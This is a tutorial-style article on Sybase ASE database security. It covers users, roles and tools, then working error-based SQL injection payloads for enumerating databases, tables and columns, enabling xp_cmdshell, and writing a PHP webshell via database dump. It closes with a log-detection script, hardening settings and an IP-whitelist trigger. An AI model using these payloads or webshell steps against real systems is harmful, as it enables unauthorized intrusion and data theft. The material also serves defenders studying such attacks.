
Example Analysis of Sybase Database Security

2025-01-16 Update From: SLTechnology News&Howtos


This article shares an example analysis of Sybase database security. The editor considers it very practical and shares it here for study.

0x00 Introduction to the Sybase database

Brief introduction

Sybase's full name is SAP Sybase Adaptive Server Enterprise (ASE or Sybase ASE for short). It inherits from the original code of MSSQL and is closely related to MSSQL. Sybase is a relational database system, a typical large client/server database system for UNIX or Windows NT platforms. It uses PowerBuilder as the development tool and SAP Sybase SQL Anywhere as the client. The current version is ASE 15.7.x; version numbering went directly from 12.5.5 to 15.0.0, skipping 13 and 14. The version tested here is 12.5.2; 12.5 is the most stable of the 12.x releases.

When creating a database, pay attention to the storage devices:

Services and Ports

Open Port:

Backup service: 5001, monitoring service: 5002, database master service: 5000, stored procedure service: 5004

Default database

master: the core system database. It controls the operation of the server and stores information about all user databases and their storage devices, including user names and passwords.

model: the template database. When a user database is created, the system copies the model database and expands the copy to the size specified by the user.

sybsystemprocs: stores the system stored procedures.

sybsystemdb: supports distributed transaction management.

tempdb: holds temporary tables and other temporary data.

Registered users and database users

When SQL SERVER creates a registered user (a login), that user can legally connect to SQL SERVER, and the login information is stored in the syslogins table in the master database. However, a registered user can use the tables in a database, within the granted restrictions, only after becoming a database user and being granted permissions.

Create a registered user:

sp_addlogin loginame, passwd (use sp_droplogin to delete)

Create a database user:

[dbname..]sp_adduser loginame (loginame must already be a registered user, otherwise an error is reported)

Assign permissions:

grant all | select,insert,delete,update on table_name | view_name | stored_procedure_name to username

or

grant all | create database,create default,create procedure,create rule,create table,create view,set proxy,set session authorization to username

Database user classification

The sa user, database owners, database object owners and ordinary database users:

1) sa user: the system user, with full permissions.

2) Database owner (dbo): can operate on all objects (tables, views, stored procedures, etc.) in the database it owns.

3) Database object owner: in practice, this is generally the database owner.

4) Ordinary database user: similar to public. An ordinary database user must be granted permissions on objects in the database (tables, views, procedures, etc.) before it can operate on them.

Aliases and groups

1) Alias: an alias lets a registered SQL SERVER user access a database as an existing database user, with the same permissions as that user.

2) Group: a group is a collection of database users. Controlling the permissions of the group controls the database users in it, although individual users in the group can still be given special treatment.

Role

In database systems with a detailed division of administrative duties, the sa user's responsibilities are often divided into three roles: the system administrator role (SA role), the system security officer role (SSO role), and the operator role (OPER role).

Connectivity and management tools

1) isql

Similar to mysql.exe for the MySQL database. It can connect to local and network databases. Connect with isql -U sa -P "":

All options are case sensitive:

-? displays a syntax summary of the isql switches.

-L lists the servers configured locally and the servers broadcasting on the network.

-U login_id is the user's login ID. Login IDs are case sensitive.

-P password is the password supplied by the user. If the -P option is not used, isql prompts for a password. If -P is given at the end of the command line without a password, isql uses the default password (NULL). Passwords are case sensitive.

-S server_name specifies the instance of SQL Server to connect to. If no server is specified, isql connects to the default instance of SQL Server on the local computer. This option is required when running isql from a remote computer on the network.

-H hostname is the hostname of the client in use.

-d database_name specifies the database to use.

2) Sybase SQL Advantage (official)

Disadvantages: a) It ships with the complete database installation package, and it has version requirements.

b) It only supports SQL statements. I think of it as a graphical version of isql, and it is somewhat inconvenient.

(sql.ini settings and functions: http://blog.csdn.net/potato015/article/details/2450989)

3) Sybase Central (official)

Disadvantages: a) It ships with the complete database installation package, and it has version requirements.

b) It is not very powerful.

4) DBArtisan

0x01 Sybase security

Executing system commands

xp_cmdshell is not enabled by default. When xp_cmdshell is not enabled:

Enable xp_cmdshell: sp_configure 'xp_cmdshell context',0

Executing a command after enabling xp_cmdshell:

Executing xp_cmdshell with insufficient permissions:

Details:

1. Executing sp_configure 'xp_cmdshell context',0 allows every login with the sa_role role to execute xp_cmdshell commands. This is turned off by default.

2. With the default, sp_configure 'xp_cmdshell context',1, testing shows that the login must have the same user name and password as a Windows account, and that account must belong to the Administrators group. One detail cannot be ignored: "User must change password at next logon" must be deselected for that account.

3. Because MSSQL is integrated with Windows, it can log in to the database directly with a system account. Sybase has to be configured as in step 2 above to achieve a similar effect.

Comment characters and UNION queries

UNION is supported. Comments are written with /**/ and --, spaces can be replaced with /**/ or with +, and count(*) is supported, but wildcards cannot appear in subqueries.

Version 12.5.2 and earlier do not support the TOP keyword, so an injected statement such as select top N from reports an error.

Since TOP is unavailable, the alternative is set rowcount N.

However, set rowcount N does not seem to support subqueries or conditionals:

Multi-statement execution

Unlike MSSQL, multiple statements are separated directly by spaces rather than semicolons.

Encoding support

Same as MSSQL:

SQL injection characteristics

With PHP as the script:

With Java as the script:

Determine whether the backend is a Sybase database:

id=1 and exists (select * from master.dbo.ijdbc_function_escapes)

Note that, unlike MSSQL, Sybase does not support direct comparison of values of different types, which matters for error-based injection:

id=1 and 1=user

id=1 and 1=convert (integer,user)

id=1 and 1=convert (integer, (select+@@version))

id=-1 union select 1, ", (select @@version)

Listing databases (complex version):

Id=1 and 1=convert (integer, (SELECT MIN (ISNULL (CONVERT (NVARCHAR (4000), gJyQ.name), CHAR (32)) FROM (SELECT name FROM master..sysdatabases) AS gJyQ WHERE CONVERT (NVARCHAR (4000), gJyQ.name) >'))

This lists the first database, master.

Id=1 and 1=convert (integer, (SELECT MIN (ISNULL (CONVERT (NVARCHAR (4000), gJyQ.name), CHAR (32)) FROM (SELECT name FROM master..sysdatabases) AS gJyQ WHERE CONVERT (NVARCHAR (4000), gJyQ.name) > 'master'))

This lists the first database other than master.

Listing databases (simple version):

id=1 and 1=convert (integer, (SELECT name FROM master..sysdatabases where dbid=1))

Keep increasing the value of dbid. dbid is a consecutive number, so it is easy to guess.

PS: although Sybase cannot use TOP or for xml path, it supports having, where not in and other syntax, so there are still many variations available.

One difference from MSSQL: the column is xtype in MSSQL and type in Sybase.

Listing tables (complex version only):

Id=1 and 1=convert (integer, (select MIN (ISNULL (CONVERT (NVARCHAR (4000), aaaa.name), CHAR (32)) from (select name from test.dbo.sysobjects where type='U') AS aaaa where CONVERT (NVARCHAR (4000), aaaa.name) >'))

This lists the first table, cmd.

Id=1 and 1=convert (integer, (select MIN (ISNULL (CONVERT (NVARCHAR (4000), aaaa.name), CHAR (32)) from (select name from test.dbo.sysobjects where type='U') AS aaaa where CONVERT (NVARCHAR (4000), aaaa.name) > 'cmd'))

This lists the first table other than cmd: cmd0.

Listing columns:

select name from test..syscolumns where id=object_id ('users') and colid=1

Increment colid for each subsequent column. That is:

Id=1 and 1=convert (integer, (select name from test..syscolumns where id=object_id ('users') and colid=1))

Tool injection:

Pangolin could not enumerate the database names. A packet capture showed that it uses the TOP keyword, so Pangolin seems to support only Sybase versions after 12.5.3.

Writing a file via backup (webshell)

Prerequisites:

1. The backup service is enabled.

2. The backup service allows remote access.

3. Database permissions (host permissions) plus disk write permissions.

Steps:

1. create table cmd (a image)--

2. insert into cmd (a) values ('')--

3. dump database test to 'C:\wamp\www\1.php' [full backup]

(the MSSQL equivalent is: backup database database_name to disk='C:\wamp\www\1.php' WITH DIFFERENTIAL,FORMAT;--)

dump TRANSACTION test to 'C:\wamp\www\1.php' [log backup]

(the MSSQL equivalent is: backup log database_name to disk='d:\www\xxx\test.asp'--)

Note: dump TRANSACTION requires that the data files and log files are not stored on the same device.

4. drop table cmd--
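
The request patterns shown in the injection and backup sections above can be turned into a detection check for web access logs. The following Python is an added example, not code from the original article; the signature names, the /item.php endpoint and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Signatures taken from the statements shown on this page; matched after
# URL-decoding and after /**/ comments and whitespace are removed.
SIGNATURES = {
    "sybase-fingerprint": re.compile(r"ijdbc_function_escapes"),
    "error-based-convert": re.compile(r"convert\(integer,"),
    "catalog-enumeration": re.compile(r"sysdatabases|sysobjects|syscolumns"),
    "version-probe": re.compile(r"@@version"),
    "os-command": re.compile(r"xp_cmdshell"),
    "dump-to-file": re.compile(r"dump(database|transaction)\w*to"),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalize(raw):
    """Undo up to three layers of URL encoding, then drop comments and spaces."""
    for _ in range(3):
        decoded = unquote_plus(raw)
        if decoded == raw:
            break
        raw = decoded
    raw = re.sub(r"/\*.*?\*/", "", raw.lower(), flags=re.S)
    return re.sub(r"\s+", "", raw)

def scan_line(line):
    """Return the sorted signature names matching one access-log line."""
    match = REQUEST.search(line)
    if not match:
        return []
    text = normalize(urlsplit(match.group(1)).query)
    return sorted(n for n, rx in SIGNATURES.items() if rx.search(text))

# Constructed sample lines: documentation IP, hypothetical /item.php endpoint.
LOG_FMT = '203.0.113.7 - - [16/Jan/2025:10:00:00 +0000] "GET /item.php?id=%s HTTP/1.1" 200 512'
SAMPLE_LOG = [LOG_FMT % q for q in (
    "1",
    "1+and+exists(select+*+from+master.dbo.ijdbc_function_escapes)",
    "1+and+1=convert/**/(integer,(select+@@version))",
    "1%2520and%25201=convert(integer,(select%2520name%2520from%2520master..sysdatabases))",
    "convert+integer+to+text",
)]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(scan_line(entry), entry.split('"')[1])
```

The fourth sample is double URL-encoded and the third hides the keyword behind a /**/ comment; both are still matched because normalization runs before the signatures.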

Hardening and prevention

Passwords

sp_password "original password", "new password", user name

For example, to change the password of the sa user from empty to 123456: sp_password NULL, "123456", sa

sp_configure "minimum password length", 8 -- minimum password length

sp_configure "check password for digit", 1 -- password must contain at least one digit

sp_configure "systemwide password expiration", 90 -- password validity period

sp_configure "maximum failed logins", 5 -- failed-login lockout threshold

Delete the extended stored procedure xp_cmdshell and delete sybsyesp.dll:

exec sp_dropextendedproc xp_cmdshell

Disable the sa account:

sp_locklogin sa, "lock"

Turn off remote access:

exec sp_configure "allow remote access", 0

After it is turned off, many services, such as backup, become unavailable.

Login IP whitelist

The system has no built-in login restrictions, so a login IP whitelist can only be implemented by creating a login trigger.

create procedure login_trg
as
declare @ip varchar(18), @login_name varchar(20)
begin
    -- look up the client address and login name of the current session
    select @ip = t.ipaddr, @login_name = suser_name()
    from master.dbo.sysprocesses t
    where t.spid = @@spid
    -- reject any client that is not the whitelisted address
    if @ip <> '192.168.0.102'
    begin
        raiserror 30000 'IP address %1!, with user %2! login failed!', @ip, @login_name
        select syb_quit()
    end
    else
        print 'Welcome!'
end

After creating the login trigger, execute the following commands:

isql> grant execute on login_trg to loginname

isql> sp_modifylogin loginname, "login script", login_trg

Logging

isql> exec sp_configure "log audit logon failure", 1 -- record failed logins

isql> exec sp_configure "log audit logon success", 1 -- record successful logins
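
The settings from the hardening section can be checked mechanically. The following Python is an added example, not part of the original article; it assumes the configuration values have been exported as plain "name = value" lines (a hypothetical format, not the native sp_configure output), and the sample export is constructed.

```python
# Baseline from the hardening section above: parameter -> (check, expected).
# Assumption: 0 means "no expiry" / "no lockout", so 0 fails those two checks.
BASELINE = {
    "minimum password length": (lambda v: v >= 8, ">= 8"),
    "check password for digit": (lambda v: v == 1, "1"),
    "systemwide password expiration": (lambda v: 1 <= v <= 90, "1..90"),
    "maximum failed logins": (lambda v: 1 <= v <= 5, "1..5"),
    "allow remote access": (lambda v: v == 0, "0"),
    "xp_cmdshell context": (lambda v: v != 0, "not 0"),
    "log audit logon failure": (lambda v: v == 1, "1"),
    "log audit logon success": (lambda v: v == 1, "1"),
}

def parse_export(text):
    """Parse 'name = value' lines, ignoring blanks and '--' comments."""
    values = {}
    for line in text.splitlines():
        name, sep, value = line.split("--", 1)[0].partition("=")
        if sep:
            values[name.strip().lower()] = value.strip()
    return values

def audit(text):
    """Return sorted (parameter, found, expected) tuples for failed checks."""
    values = parse_export(text)
    findings = []
    for name, (check, expected) in BASELINE.items():
        found = values.get(name, "missing")
        # A missing or non-numeric value is reported as a finding, not skipped.
        if not found.isdigit() or not check(int(found)):
            findings.append((name, found, expected))
    return sorted(findings)

# Constructed sample export (hypothetical format and values).
SAMPLE_EXPORT = """
minimum password length = 6
check password for digit = 1
systemwide password expiration = 0   -- passwords never expire
maximum failed logins = 5
allow remote access = 1
xp_cmdshell context = 0
log audit logon failure = 1
"""

if __name__ == "__main__":
    for name, found, expected in audit(SAMPLE_EXPORT):
        print(f"FAIL {name}: found {found}, expected {expected}")
```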
